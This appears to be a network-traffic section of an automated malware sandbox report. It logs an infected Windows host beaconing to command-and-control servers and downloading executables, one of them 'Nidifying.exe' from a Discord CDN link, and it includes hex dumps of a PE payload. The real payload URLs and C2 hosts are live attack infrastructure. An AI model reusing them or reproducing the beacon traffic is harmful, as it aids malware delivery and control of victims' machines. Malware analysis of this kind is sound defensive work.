                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Content-Type: text/plain; charset=UTF-8
                                                                                                                                  Content-Length: 128
                                                                                                                                  Host: 185.163.204.24
                                                                                                                                  Jan 11, 2022 23:39:06.494944096 CET19399INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:06 GMT
                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Data Raw: 31 66 34 37 0d 0a 56 71 69 52 61 32 76 62 58 53 4d 55 33 4b 45 76 2b 78 52 39 35 52 47 76 6b 67 54 42 74 30 67 32 56 75 30 57 71 6f 67 79 4d 61 76 6f 75 6f 76 72 78 51 55 66 4e 52 4c 42 2f 45 41 61 6f 50 64 4d 37 41 4c 5a 58 53 30 65 6b 7a 4f 71 2f 44 5a 44 73 53 4d 55 57 5a 6e 78 41 77 6e 4e 37 34 62 41 78 42 30 55 42 34 4e 69 4f 76 62 58 41 49 67 54 67 4a 32 36 31 6f 6b 63 2f 4b 46 74 38 6a 69 4f 55 68 63 45 69 59 2f 5a 77 39 4b 48 52 43 59 49 43 61 51 67 41 6a 69 5a 78 58 2f 69 44 6f 70 6c 44 77 73 76 79 63 56 47 41 59 33 45 4e 31 61 36 6c 58 42 66 67 75 4c 43 70 55 74 79 55 46 6f 64 59 7a 37 4d 4f 75 49 63 42 6b 2b 55 38 6f 30 73 4f 7a 32 53 2b 50 36 79 59 63 71 73 4d 6e 46 4d 54 69 72 4b 38 64 2b 55 51 30 7a 4d 63 34 57 78 63 57 6c 78 69 35 55 42 6e 43 52 6b 68 47 68 6c 74 4b 46 45 50 4c 77 59 56 4f 6a 48 56 6b 55 4a 6c 34 74 51 69 58 48 77 73 55 6a 59 73 38 6f 4f 69 73 53 35 35 79 69 73 4b 5a 59 37 75 76 34 6e 55 51 35 46 6c 36 32 2f 67 55 46 49 52 68 72 48 59 62 59 52 53 4f 2b 44 4b 37 6f 34 75 4d 56 59 35 5a 41 4c 58 6b 56 50 55 68 5a 4b 6f 72 4c 79 71 47 52 30 6d 72 63 6d 67 2f 57 53 6a 50 75 6e 79 70 62 5a 43 73 69 71 78 34 4d 59 30 4e 34 50 55 4d 4e 42 77 42 68 7a 44 5a 62 4e 64 33 45 45 48 49 30 44 34 79 6b 32 55 6b 30 41 7a 4b 54 73 39 36 42 58 6e 56 43 4f 56 70 31 66 4f 71 58 77 30 66 4d 57 71 39 53 33 43 4e 45 39 7a 31 63 6a 77 79 56 6f 6c 53 46 78 6c 6f 72 6e 57 67 34 68 46 59 59 4b 43 62 56 35 78 73 4d 65 46 43 42 48 7a 6e 44 77 68 4a 53 5a 73 57 68 61 58 6d 64 54 4f 54 2f 67 66 66 57 38 67 79 37 58 4b 6d 74 50 48 59 6e 56 77 6a 6a 79 38 30 71 77 6d 74 71 49 69 51 63 36 46 2b 6a 31 30 51 6c 79 4b 37 30 34 75 37 50 55 46 72 7a 56 6b 51 57 73 78 6a 74 65 4f 58 58 67 70 52 4f 2b 4a 72 34 4b 45 45 36 47 4d 4b 38 51 73 7a 32 57 68 48 54 4b 4c 6b 73 76 59 37 66 4f 6d 48 57 57 55 73 62 76 76 4e 34 51 2f 75 72 34 5a 58 6f 77 77 6d 59 46 6b 6e 72 2b 4b 36 43 33 49 72 35 4e 56 33 73 30 4e 6d 56 4f 31 59 4a 42 54 38 6e 51 47 4a 42 45 71 72 33 6c 6c 69 41 42 78 55 59 5a 2f 7a 45 36 64 62 63 79 61 44 4e 71 75 50 2b 55 51 56 31 4c 46 4d 64 34 46 74 4c 45 32 56 65 38 38 61 70 70 6a 6b 68 56 4a 72 4a 2f 4c 50 50 67 48 7a 6f 54 38 55 4b 31 7a 57 5a 31 42 57 53 55 43 49 66 64 63 42 62 2b 6a 56 79 4a 35 38 45 4a 32 69 79 4f 37 4a 76 52 77 67 69 71 52 61 31 64 43 35 37 67 58 43 2b 33 5a 37 6c 6f 34 5a 49 66 6f 4c 54 31 48 46 79 61 71 79 65 6b 75 73 4b 4e 38 7a 37 48 63 54 4d 4f 65 77 67 79 49 51 58 62 53 66 66 4b 36 65 77 6f 57 33 6a 71 4d 46 57 2b 41 6c 72 4a 56 78 57 71 4f 55 6e 6b 37 36 37 69 74 61 73 76 38 75 48 31 44 2b 36 48 6f 52 4f 47 5a 65 68 59 78 4b 6c 79 2b 6c 2b 6c 74 4b 5a 6d 68 55 67 34 64 68 65 76 2b 2f 79 38 5a 31 5a 32 58 37 4e 5a 6c 4e 56 75 37 48 64 50 68 4a 46 62 6c 4a 2f 35 67 43 51 56 30 48 66 69 63 76 73 37 64 51 4e 79 37 4a 70 48 75 49 52 67 54 6c 67 48 35 4c 5a 56 76 63 6d 31 70 36 38 59 4f 69 74 38 43 6d 73 37 67 42 76 77 30 4d 6d 46 67 56 2f 4a 2f 77 7a 68 4c 59 4c 47 4a 75 70 49 77 72 7a 33 54 49 70 65 74 4d 63 76 46 37 6a 37 31 4d 59 45 63 4f 78 4a 6a 56 65 68 70 64 69 4a 44 74 33 2b 6c 58 2f 65 2b 4c 67 66 69 2b 57 64 37 42 4b 41 2b 6b 38 36 75 31 39 49 39 76 65 79 77 55 37 2f 6c 59 6b 64 75 35 6c 64 59 41 75 63 41 2f 6b 57 61 65 50 72 44 38 4b 4a 53 4a 64 72 33 50 6e 57 32 43 6a 55 59 52 4e 72 33 63 5a 31 43 68 6f 52 30 37
                                                                                                                                  Data Ascii: 1f47VqiRa2vbXSMU3KEv+xR95RGvkgTBt0g2Vu0WqogyMavouovrxQUfNRLB/EAaoPdM7ALZXS0ekzOq/DZDsSMUWZnxAwnN74bAxB0UB4NiOvbXAIgTgJ261okc/KFt8jiOUhcEiY/Zw9KHRCYICaQgAjiZxX/iDoplDwsvycVGAY3EN1a6lXBfguLCpUtyUFodYz7MOuIcBk+U8o0sOz2S+P6yYcqsMnFMTirK8d+UQ0zMc4WxcWlxi5UBnCRkhGhltKFEPLwYVOjHVkUJl4tQiXHwsUjYs8oOisS55yisKZY7uv4nUQ5Fl62/gUFIRhrHYbYRSO+DK7o4uMVY5ZALXkVPUhZKorLyqGR0mrcmg/WSjPunypbZCsiqx4MY0N4PUMNBwBhzDZbNd3EEHI0D4yk2Uk0AzKTs96BXnVCOVp1fOqXw0fMWq9S3CNE9z1cjwyVolSFxlornWg4hFYYKCbV5xsMeFCBHznDwhJSZsWhaXmdTOT/gffW8gy7XKmtPHYnVwjjy80qwmtqIiQc6F+j10QlyK704u7PUFrzVkQWsxjteOXXgpRO+Jr4KEE6GMK8Qsz2WhHTKLksvY7fOmHWWUsbvvN4Q/ur4ZXowwmYFknr+K6C3Ir5NV3s0NmVO1YJBT8nQGJBEqr3lliABxUYZ/zE6dbcyaDNquP+UQV1LFMd4FtLE2Ve88appjkhVJrJ/LPPgHzoT8UK1zWZ1BWSUCIfdcBb+jVyJ58EJ2iyO7JvRwgiqRa1dC57gXC+3Z7lo4ZIfoLT1HFyaqyekusKN8z7HcTMOewgyIQXbSffK6ewoW3jqMFW+AlrJVxWqOUnk767itasv8uH1D+6HoROGZehYxKly+l+ltKZmhUg4dhev+/y8Z1Z2X7NZlNVu7HdPhJFblJ/5gCQV0Hficvs7dQNy7JpHuIRgTlgH5LZVvcm1p68YOit8Cms7gBvw0MmFgV/J/wzhLYLGJupIwrz3TIpetMcvF7j71MYEcOxJjVehpdiJDt3+lX/e+Lgfi+Wd7BKA+k86u19I9veywU7/lYkdu5ldYAucA/kWaePrD8KJSJdr3PnW2CjUYRNr3cZ1ChoR07
                                                                                                                                  Jan 11, 2022 23:39:06.558027029 CET19408OUTGET //l/f/D2vuR34BZ2GIX1a3wJC_/2e2f0b66d11308f3e72c19e69852b8803e8aa69b HTTP/1.1
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Host: 185.163.204.24
                                                                                                                                  Jan 11, 2022 23:39:07.279370070 CET19423INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:07 GMT
                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                  Content-Length: 916735
                                                                                                                                  Connection: keep-alive
                                                                                                                                  Last-Modified: Fri, 07 Jan 2022 23:09:58 GMT
                                                                                                                                  ETag: "61d8c846-dfcff"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c 00 00 00 c4 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 bc 08 00 00 00 60 0c 00 00 0a 00 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 69 02 00 00 00 70 0c 00 00 04 00 00 00 ea 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 d3 1c 00 00 00 80 0c 00 00 1e 00 00 00 ee 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 90 02 00 00 00 a0 0c
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt\!Zpa H 03.textXXZ`P`.datap`@`.rdata |@`@.bss(`.edata "@0@.idataH@0.CRT,@0.tls @0.rsrc @0.reloc304@0B/4p@@B/19@B/31 @B/45@@B/57`@0B/70ip@B/81@B/92


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  69192.168.2.5498855.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:39:06.351121902 CET19396OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://hrquqg.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 369
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:39:06.478239059 CET19397INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:06 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  7192.168.2.549888144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  70192.168.2.5498865.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:39:06.580609083 CET19409OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://mqcayqmoy.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 122
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:39:06.700311899 CET19410INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:06 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 33 39 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc b9 19 eb 1b db 76 f8 04 48 c6 35 d0 d8 66 ea 25 5e 1b ee a8 88 1c bf 55 c7 17 9e ab 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 39I:82OTevH5f%^U0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  71192.168.2.5498915.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:39:09.135430098 CET21737OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://nfqnt.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 195
                                                                                                                                  Host: host-data-coin-11.com
                                                                                                                                  Jan 11, 2022 23:39:09.259510994 CET21739INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:39:09 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  72192.168.2.54989278.46.160.8780
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:39:09.251406908 CET21738OUTPOST /565 HTTP/1.1
                                                                                                                                  Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                  Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                  Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                  Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                  Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                                                                                  Content-Length: 25
                                                                                                                                  Host: 78.46.160.87
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a
                                                                                                                                  Data Ascii: --1BEF0A57BE110FD467A--


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  73192.168.2.5498935.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  Jan 11, 2022 23:39:09.371618986 CET21740OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ufveq.org/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 178
                                                                                                                                  Host: host-data-coin-11.com


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  74192.168.2.5498965.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  75192.168.2.5498975.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  76192.168.2.5498985.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  77192.168.2.54989937.140.192.5080C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  78192.168.2.5499035.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  79192.168.2.5499045.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  8192.168.2.549890149.28.78.238443
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  80192.168.2.5499055.188.88.18480C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  81192.168.2.54990778.46.160.8780
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  9192.168.2.549894144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  0192.168.2.549787185.233.81.115443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-01-11 22:38:11 UTC0OUTGET /32739433.dat?iddqd=1 HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: 185.233.81.115
                                                                                                                                  2022-01-11 22:38:11 UTC0INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:11 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 153
                                                                                                                                  Connection: close
                                                                                                                                  2022-01-11 22:38:11 UTC0INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.2.549809162.159.133.233443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-01-11 22:38:26 UTC0OUTGET /attachments/903666793514672200/930134152861343815/Nidifying.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: cdn.discordapp.com
                                                                                                                                  2022-01-11 22:38:26 UTC0INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 11 Jan 2022 22:38:26 GMT
                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                  Content-Length: 537088
                                                                                                                                  Connection: close
                                                                                                                                  CF-Ray: 6cc1a2a68bb54e2b-FRA
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Age: 108750
                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                  Content-Disposition: attachment;%20filename=Nidifying.exe
                                                                                                                                  ETag: "d7df01d8158bfaddc8ba48390e52f355"
                                                                                                                                  Expires: Wed, 11 Jan 2023 22:38:26 GMT
                                                                                                                                  Last-Modified: Mon, 10 Jan 2022 16:21:03 GMT
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                  x-goog-generation: 1641831663140006
                                                                                                                                  x-goog-hash: crc32c=9zjujw==
                                                                                                                                  x-goog-hash: md5=198B2BWL+t3Iukg5DlLzVQ==
                                                                                                                                  x-goog-metageneration: 1
                                                                                                                                  x-goog-storage-class: STANDARD
                                                                                                                                  x-goog-stored-content-encoding: identity
                                                                                                                                  x-goog-stored-content-length: 537088
